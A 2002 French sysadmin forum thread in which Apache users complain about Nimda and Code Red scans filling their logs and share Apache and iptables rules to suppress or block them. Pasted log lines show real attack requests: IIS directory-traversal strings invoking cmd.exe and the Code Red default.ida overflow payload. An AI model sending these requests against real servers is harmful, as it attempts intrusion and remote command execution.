Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
3451 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs

  marre des petits cons ...

 
 


Dernière réponse
Sujet : marre des petits cons ...
kadreg

Sly Angel a écrit a écrit :

 
 
ça marche bien ça ? :??:




 
j'sais pas, j'ai pas testé, mais je me la garde en stock

Votre réponse
Nom d'utilisateur    Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !
Le ton de votre message                        
                       
Votre réponse
[b][i][u][strike][spoiler][fixed][cpp][url][email][img][*]   
 
   [quote]
 
Options

 
Vous avez perdu votre mot de passe ?


Vue Rapide de la discussion
kadreg

Sly Angel a écrit a écrit :

 
 
ça marche bien ça ? :??:




 
j'sais pas, j'ai pas testé, mais je me la garde en stock
Sly Angel

kadreg a écrit a écrit :

iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK,PSH ACK,PSH --dport 80 -m string --string '/default.ida?' -j REJECT --reject-with tcp-reset
 
Ca demande le string match
 




 
ça marche bien ça ? :??:
kadreg iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK,PSH ACK,PSH --dport 80 -m string --string '/default.ida?' -j REJECT --reject-with tcp-reset
 
Ca demande le string match
Sly Angel

aurelboiss a écrit a écrit :

pour les failles de secu sur apache g opte pour la version 2.0.40 qui est stable depuis 20 jours chez moi :) sinon y'a un moyen de pas avoir ca dans les log avec une ptite regle iptables si quelqu'un pouvait la mettre ca serait cool de sa part  :jap:  
 
@++




 
Bah non, parce qu'iptables gère des conditions sur l'IP ou le port ou alors sur les paquets ( taille, type, nombre ). Mais là comme ce sont des requêtes HTTP normales de tas d'IP différentes, tu peux rien faire avec iptables, surtout que ça n'a rien à voir avec le log.
 
La meilleure solution reste donc de les ignorer dans la config apache
aurelboiss pour les failles de secu sur apache g opte pour la version 2.0.40 qui est stable depuis 20 jours chez moi :) sinon y'a un moyen de pas avoir ca dans les log avec une ptite regle iptables si quelqu'un pouvait la mettre ca serait cool de sa part  :jap:  
 
@++
j0s3

Citation :

Bah ils ont un IIS pourri qui en plus est verrolé, je vois pas comment ils peuvent se faire plus mal :D


 
T'as raison, mais bon font chier avec leurs daubes. A un moment l'incompétence rejoint la malveillance.
Sly Angel

j0s3 a écrit a écrit :

Citation :

A un moment je loggais à part ce genre de requêtes de merde pour faire des stats. Si tu commences à vouloir tester toutes les IP de ce genre de requêtes, tu vas pouvoir y passer des heures tu sais ;)


 
Je suis motivé  :D  
 
Je leur veut du mal, beaucoup de mal :gun:




 
Bah ils ont un IIS pourri qui en plus est verrolé, je vois pas comment ils peuvent se faire plus mal :D
j0s3

Citation :

A un moment je loggais à part ce genre de requêtes de merde pour faire des stats. Si tu commences à vouloir tester toutes les IP de ce genre de requêtes, tu vas pouvoir y passer des heures tu sais ;)


 
Je suis motivé  :D  
 
Je leur veut du mal, beaucoup de mal :gun:
911GT3

j0s3 a écrit a écrit :

Citation :

Ca empeche pas de taper a la porte et de demander si y'a pas un IIS derriere hein :D


 
Yaisse, mais je pense Nerd si l'addresse demandeuse de la requête n'est pas un serveur oueb.
Si en face ca ne répond pas à une requête http, c'est que c'est ni Nimda, ni Code Red. Mais un des petits cons en question




 
c'est peut-être un gars qui sait pas configurer convenablement son firewall [:ddr555]
Sly Angel

j0s3 a écrit a écrit :

Citation :

Ca empeche pas de taper a la porte et de demander si y'a pas un IIS derriere hein :D


 
Yaisse, mais je pense Nerd si l'addresse demandeuse de la requête n'est pas un serveur oueb.
Si en face ca ne répond pas à une requête http, c'est que c'est ni Nimda, ni Code Red. Mais un des petits cons en question




 
A un moment je loggais à part ce genre de requêtes de merde pour faire des stats. Si tu commences à vouloir tester toutes les IP de ce genre de requêtes, tu vas pouvoir y passer des heures tu sais ;)
j0s3

Citation :

Ca empeche pas de taper a la porte et de demander si y'a pas un IIS derriere hein :D


 
Yaisse, mais je pense Nerd si l'addresse demandeuse de la requête n'est pas un serveur oueb.
Si en face ca ne répond pas à une requête http, c'est que c'est ni Nimda, ni Code Red. Mais un des petits cons en question
minusplus

Parano a écrit a écrit :

 
 
C jolie comme expression nan ?  :D  



wé bon overflow koi ! :D
parano

j0s3 a écrit a écrit :

Je croyais que nimda n'infectait que les serveurs IIS.
 




 
Ca empeche pas de taper a la porte et de demander si y'a pas un IIS derriere hein :D

Sly Angel

mean a écrit a écrit :

En parlant de ca il est temps d'upgrader apache les gars
Il y a 2/3 joyeusetes dont une vient d'etre corrigees....




 
Moi j'ai tout fait entre 8h et 9h, je suis tranquille :D
j0s3

Citation :

Nimda et Red code, c pas souvent volontaire mais des machines infectées.  
 
Mets ça dans ton httpd.conf :  
 
SetEnvIf Request_URI "\.exe$" nolog  
SetEnvIf Request_URI "\.ida$" nolog  
 
CustomLog /rep/acces.log combined env=!nolog  
 
 
ça t'évitera ça ( tu peux faire plus évolué pour les expressions regulières si tu veux loguer tes .exe à toi tout de même )


 
Merci, ça va soigner mon ulcère  :jap:

parano

minusplus a écrit a écrit :

 
 
il essaye un buffer overflox là ?




 
C jolie comme expression nan ?  :D

mean En parlant de ca il est temps d'upgrader apache les gars
Il y a 2/3 joyeusetes dont une vient d'etre corrigees....
Sly Angel

minusplus a écrit a écrit :

 
 
il essaye un buffer overflox là ?




 
Ca c'est Code Red :D
Sly Angel Nimda et Red code, c pas souvent volontaire mais des machines infectées.
 
Mets ça dans ton httpd.conf :
 
SetEnvIf Request_URI "\.exe$" nolog
SetEnvIf Request_URI "\.ida$" nolog
 
CustomLog /rep/acces.log combined env=!nolog
 
 
ça t'évitera ça ( tu peux faire plus évolué pour les expressions regulières si tu veux loguer tes .exe à toi tout de même )
911GT3 vous en avez de saines lectures  :wahoo:  
 
(jesuisdésoeuvrédésolé)
j0s3 Je croyais que nimda n'infectait que les serveurs IIS.
 
Si il n'y a pas de serveur sur l'addresse IP du demamdeur, c'est que c'est autre chose. Non ?
 
Si tu as raison la quantité de serveurs IIS infectée est colosale. Et M$ dans ce cas est très fort, ils arrivent a m'emmerder quand même avec leurs vulnérabilités. p'tain  :fou:
minusplus

Parano a écrit a écrit :

 
61.56.131.38 - - [04/Oct/2002:10:45:08 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u
cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 323 "-" "-"
 




 
il essaye un buffer overflox là ?
parano

j0s3 a écrit a écrit :

Vi pareil pour moi...
 
Chiantissime quand tu cherches les vraies erreurs.  :fou:  




 
y'a des scripts pour epurer les logs remplis d'alerte nimda et autres...  :sarcastic:

j0s3 Vi pareil pour moi...
 
Chiantissime quand tu cherches les vraies erreurs.  :fou:
trictrac non, c'est nimda.. ca fait un an que mes logs en sont pleins, tu veux que je te les balances.. c'est humainement impossible de fazire ca a la main
parano 80.11.163.246 - - [04/Oct/2002:10:26:49 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:26:53 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:26:57 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:04 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:10 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:18 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:24 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:34 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir H
TTP/1.0" 404 336 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 336 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:19 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
61.56.131.38 - - [04/Oct/2002:10:45:08 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u
cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 323 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:29 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:30 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:31 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:32 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:33 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:33 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:43 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTT
P/1.0" 404 336 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:47 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:47 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:48 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:48 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:49 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
 
 
 :sarcastic:
j0s3 J'y ai pensé, mais ça m'etonnerai. Ils essayent généralement plusieurs trucs et pas toujours les mêmes. Y'a des variantes
 
ils essayent de remonter sur différents niveaux. et avec des intervalles de plusieurs minutes.
 
Je suis quasi sur que ce sont des nerds.
trictrac Fake ????
 
C'est nimda le petit con en kestion, et lui il s'en fou que ce soit apache, vu qu'il prend une IP au hazard
j0s3 Voila, pratiquement un quart de l'activité de mon serveur apache consiste en des petits cons qui essayent d'aller sur ../winnt/system32/cmd.exe.
 
Mon error log est quasi exclusivement consacrée a ce type de requete.
 
Ces imbéciles ne sont même pas capables de se rendre compte qu'ils ont affaire a un Linux/Apache et pas a un NT/IIS.
 
J'aimerai bien leur faire une sale blague, genre créer un ../winnt/system32/cmd.exe qui leur foutrait la frousse.
 
Quelqu'un sait il comment s'y prendre ?

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo

Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)